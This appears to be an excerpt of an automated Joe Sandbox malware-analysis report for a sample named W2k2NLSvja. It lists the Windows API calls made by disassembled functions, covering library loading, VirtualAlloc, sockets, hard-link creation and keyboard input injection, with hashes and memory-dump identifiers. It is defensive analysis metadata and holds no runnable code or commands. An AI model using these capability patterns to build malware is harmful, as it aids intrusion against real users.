                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 2574300362-3689287502
                                                                                                                        • Opcode ID: f9631feeb98991885c84f9b5a2ac7af172cd5efd5e998658e2b28bf1cc5f830f
                                                                                                                        • Instruction ID: abb8b15674b4503182214d0284822494b90df1ec46edfa93a7acb22a54500a19
                                                                                                                        • Opcode Fuzzy Hash: f9631feeb98991885c84f9b5a2ac7af172cd5efd5e998658e2b28bf1cc5f830f
                                                                                                                        • Instruction Fuzzy Hash: 16D01271A10713CFD7319F31D81869676D8BF15361F118C2D98C6D6240D675D880DB50
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,010012C1), ref: 01001080
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01001092
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                        • Opcode ID: 60f098565c48dee64b2e86e8072f1b69f2223a3e908153b3e97040dd6c1c5dbc
                                                                                                                        • Instruction ID: 5dfcacecc3b961a167936f9ffb9f8c81adc0386b20e4644389cdb1a7fb79e942
                                                                                                                        • Opcode Fuzzy Hash: 60f098565c48dee64b2e86e8072f1b69f2223a3e908153b3e97040dd6c1c5dbc
                                                                                                                        • Instruction Fuzzy Hash: FBD012305107138FE7319F35D41855676E8AF45255F118D6DA8C9DA140D6B4C480C750
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00FF9009,?,0100F910), ref: 00FF9403
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FF9415
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                        • API String ID: 2574300362-199464113
                                                                                                                        • Opcode ID: f6df9a306d71c481c44268e2c96fe2841c2d0e08e092a0ce7cef925cf0fbf234
                                                                                                                        • Instruction ID: c20ba2e0c8b3b0915f6cbe29c6910a9520a50719703eaf74bcb294fb74fcb7fe
                                                                                                                        • Opcode Fuzzy Hash: f6df9a306d71c481c44268e2c96fe2841c2d0e08e092a0ce7cef925cf0fbf234
                                                                                                                        • Instruction Fuzzy Hash: 88D0C730A1871BCFD7328F32C90824272E8BF16361F00C83EA4C2CA510E6B4C8C0EB50
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime__swprintf
                                                                                                                        • String ID: %.3d$WIN_XPe
                                                                                                                        • API String ID: 2070861257-2409531811
                                                                                                                        • Opcode ID: 50f63737c76c0fba4812f86122a83aea51f52658d1a0268917fbabd194eb27be
                                                                                                                        • Instruction ID: dc9e0b7acb516233ae39bc589fa4d1c83bdbfdf3d365c4264d32c8342bdac1b3
                                                                                                                        • Opcode Fuzzy Hash: 50f63737c76c0fba4812f86122a83aea51f52658d1a0268917fbabd194eb27be
                                                                                                                        • Instruction Fuzzy Hash: A9D012B380411AEBCB14AA908E46FF9737CB745301F100596B542D2001F2399FA4BF21
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f5888fae161206850356afb1822751d82fbb3033db3403a0b8aee3195f8ff796
                                                                                                                        • Instruction ID: 1b1d5803f208e85ff4f23e003373c18c112e332d0bace293227aa0989835c98d
                                                                                                                        • Opcode Fuzzy Hash: f5888fae161206850356afb1822751d82fbb3033db3403a0b8aee3195f8ff796
                                                                                                                        • Instruction Fuzzy Hash: 98C16E75A04216EFCB14DF94C884AAEB7B6FF48710B19859AE805EF351E730ED41EB90
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00FFE3D2
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00FFE415
                                                                                                                          • Part of subcall function 00FFDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00FFDAD9
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00FFE615
                                                                                                                        • _memmove.LIBCMT ref: 00FFE628
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3659485706-0
                                                                                                                        • Opcode ID: ed156cb1d234fc78e9e29af095db9826a932a7b77750cc493d307ae17b0dc820
                                                                                                                        • Instruction ID: 476a1a06fc452807dd671e3b14e4356a862de777e915926873fea9f9b3ffc78c
                                                                                                                        • Opcode Fuzzy Hash: ed156cb1d234fc78e9e29af095db9826a932a7b77750cc493d307ae17b0dc820
                                                                                                                        • Instruction Fuzzy Hash: 47C18C71A083058FC714DF28C88096ABBE4FF89714F18896DF999DB361D735E906DB82
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00FF83D8
                                                                                                                        • CoUninitialize.OLE32 ref: 00FF83E3
                                                                                                                          • Part of subcall function 00FDDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDDAC5
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00FF83EE
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00FF86BF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 780911581-0
                                                                                                                        • Opcode ID: bf8b70b6489d1a9bdde1ab9317f0e1df49bc399468d199c8691501c1c65b89e0
                                                                                                                        • Instruction ID: 9b40777cef5e8e58f2cf7c6df755fd405dcc4e927aab1f43c17af4f719638266
                                                                                                                        • Opcode Fuzzy Hash: bf8b70b6489d1a9bdde1ab9317f0e1df49bc399468d199c8691501c1c65b89e0
                                                                                                                        • Instruction Fuzzy Hash: 45A16D756087059FCB10EF14C885B6AB7E4BF88364F08444DFA9A9B3A1CB74ED05EB41
                                                                                                                        APIs
                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7C32
                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7C4A
                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0100FB80,000000FF,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7C6F
                                                                                                                        • _memcmp.LIBCMT ref: 00FD7C90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314563124-0
                                                                                                                        • Opcode ID: 88624da2a813380e2757760e140ccedc438a8c9619720284a97cd7125c5840b8
                                                                                                                        • Instruction ID: 465407f8ea7647e736218f7d72b1471e89f775c97849ba4cfc6405b2ef75f678
                                                                                                                        • Opcode Fuzzy Hash: 88624da2a813380e2757760e140ccedc438a8c9619720284a97cd7125c5840b8
                                                                                                                        • Instruction Fuzzy Hash: C4812E71A00209EFCB04DF94C984EEEB7BAFF89315F244199F505AB254DB71AE05DB60
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2808897238-0
                                                                                                                        • Opcode ID: 8970ff8b59b42952ab78a691568e47d782643b16d05f583258173445ab9be509
                                                                                                                        • Instruction ID: fbff10d11d614161f79afb299c74fd39475bbabc3e04a8ae13f3dd96abfb3e14
                                                                                                                        • Opcode Fuzzy Hash: 8970ff8b59b42952ab78a691568e47d782643b16d05f583258173445ab9be509
                                                                                                                        • Instruction Fuzzy Hash: B251BB31A087019ADB30BF65D895B69B3E6AF44310F28881FE995CB3D1EB749840BB55
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(0169EB38,?), ref: 01009AD2
                                                                                                                        • ScreenToClient.USER32(00000002,00000002), ref: 01009B05
                                                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01009B72
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3880355969-0
                                                                                                                        • Opcode ID: dbc3ef1320f211ef785efe98b898583916c7be401dd38cf0e4e9c8e60d2820a7
                                                                                                                        • Instruction ID: 490aba998743c83c66f27a6b6bb74dc9883b3f9e4851b5e8c9d0db6c9d2f4129
                                                                                                                        • Opcode Fuzzy Hash: dbc3ef1320f211ef785efe98b898583916c7be401dd38cf0e4e9c8e60d2820a7
                                                                                                                        • Instruction Fuzzy Hash: 26519674900609EFEF22DF58D9809AE7BF5FF45324F108299F899972D2D731A981CB90
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00FF6CE4
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6CF4
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FF6D58
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6D64
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2214342067-0
                                                                                                                        • Opcode ID: 37cc4096bd3a15f632e7b33015bb0c48b5e26e3633733bc391fbe21a33544dd8
                                                                                                                        • Instruction ID: 26d8d9122faa6acffa760664e9fe0c7cee32df0c5a130987e343322e62006094
                                                                                                                        • Opcode Fuzzy Hash: 37cc4096bd3a15f632e7b33015bb0c48b5e26e3633733bc391fbe21a33544dd8
                                                                                                                        • Instruction Fuzzy Hash: 6C41A275740200AFEB20BF64DC87F7A77A5AF44B10F488018FA59DB2D2DAB99D01A791
                                                                                                                        APIs
                                                                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0100F910), ref: 00FF67BA
                                                                                                                        • _strlen.LIBCMT ref: 00FF67EC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4218353326-0
                                                                                                                        • Opcode ID: 3eafd3394266280ec15f10faf6996752600522e4cccd649ea13561919ebe9f73
                                                                                                                        • Instruction ID: 82d3c6bce48d32cbcd759cd6b3b089892ffa6ffb7984e24159fab5128ab78006
                                                                                                                        • Opcode Fuzzy Hash: 3eafd3394266280ec15f10faf6996752600522e4cccd649ea13561919ebe9f73
                                                                                                                        • Instruction Fuzzy Hash: EA41BE31A00109ABCB14FB64DCC5FBEB3A9AF48750F148169F9169B2A2DF78AD00E750
                                                                                                                        APIs
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FEBB09
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00FEBB2F
                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FEBB54
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FEBB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3321077145-0
                                                                                                                        • Opcode ID: 1861580190182afc44b29e7a2acc2bccddaf7f2a967b95fc74d36c871f2381a6
                                                                                                                        • Instruction ID: e4cbda78bf079be24c09c16912ecbc107820bd878c499e1d80ad2d8caba7968b
                                                                                                                        • Opcode Fuzzy Hash: 1861580190182afc44b29e7a2acc2bccddaf7f2a967b95fc74d36c871f2381a6
                                                                                                                        • Instruction Fuzzy Hash: B1413035604551DFCF21EF15C588A6DBBE1EF49320B198488EC4A9B362CB79FD01EB91
                                                                                                                        APIs
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01008B4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 634782764-0
                                                                                                                        • Opcode ID: f590a7e7b9dd68fd50b03c470c4fcd14bb8f754aa5db33b9b1924db3e6c7f1b6
                                                                                                                        • Instruction ID: 164825695b040e5f45d6df1988804b13b647224b88c677d51b902ec051d97b80
                                                                                                                        • Opcode Fuzzy Hash: f590a7e7b9dd68fd50b03c470c4fcd14bb8f754aa5db33b9b1924db3e6c7f1b6
                                                                                                                        • Instruction Fuzzy Hash: B83190B4A04A04BFFB729A2CCC85BA93BA4FB06310F14C657FBD1D62D1DA35A5808751
                                                                                                                        APIs
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0100AE1A
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0100AE90
                                                                                                                        • PtInRect.USER32(?,?,0100C304), ref: 0100AEA0
                                                                                                                        • MessageBeep.USER32(00000000), ref: 0100AF11
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1352109105-0
                                                                                                                        • Opcode ID: d1dd05bb342e88a2f347eb5ff3319369b96c3d8bbe564aa7ba9fb0c84c675a8a
                                                                                                                        • Instruction ID: 4b1c2a69bcc9ab2ec088a11a4cc235a7269e22e894f42a13dd56ad940c5108ca
                                                                                                                        • Opcode Fuzzy Hash: d1dd05bb342e88a2f347eb5ff3319369b96c3d8bbe564aa7ba9fb0c84c675a8a
                                                                                                                        • Instruction Fuzzy Hash: D2418EB4700359DFEB23CF58C484BA97BF5FB49340F1481A9E9948B286D732A942CF50
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FE1037
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00FE1053
                                                                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00FE10B9
                                                                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00FE110B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: 06b53111499c3791a8508cfd0605be0145e888834fc0d041f0c1e56cad785140
                                                                                                                        • Instruction ID: 67e733367fb41d97708b55939e5bdcd45f549203267027e404730bad5fbcced2
                                                                                                                        • Opcode Fuzzy Hash: 06b53111499c3791a8508cfd0605be0145e888834fc0d041f0c1e56cad785140
                                                                                                                        • Instruction Fuzzy Hash: 77310531E446D8AEFB318A678C05BFABBA9BF45320F08431AE691521D1C37989C5B752
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00FE1176
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FE1192
                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00FE11F1
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00FE1243
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
